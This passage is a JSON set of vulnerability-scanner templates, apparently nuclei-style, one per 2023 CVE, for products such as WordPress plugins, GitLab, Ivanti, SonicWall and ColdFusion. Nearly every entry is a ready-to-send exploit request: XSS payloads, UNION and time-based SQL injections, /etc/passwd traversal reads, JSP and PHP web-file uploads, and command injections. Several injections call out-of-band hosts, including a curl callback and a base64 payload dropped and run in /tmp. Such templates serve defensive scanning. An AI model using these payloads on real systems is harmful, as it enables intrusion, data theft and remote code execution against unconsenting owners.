Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo \"{{str2}}\"; ?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["body_5 == str2"]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress-username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress-username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress-username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress-username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29622","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\")"],"condition":"and"}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: 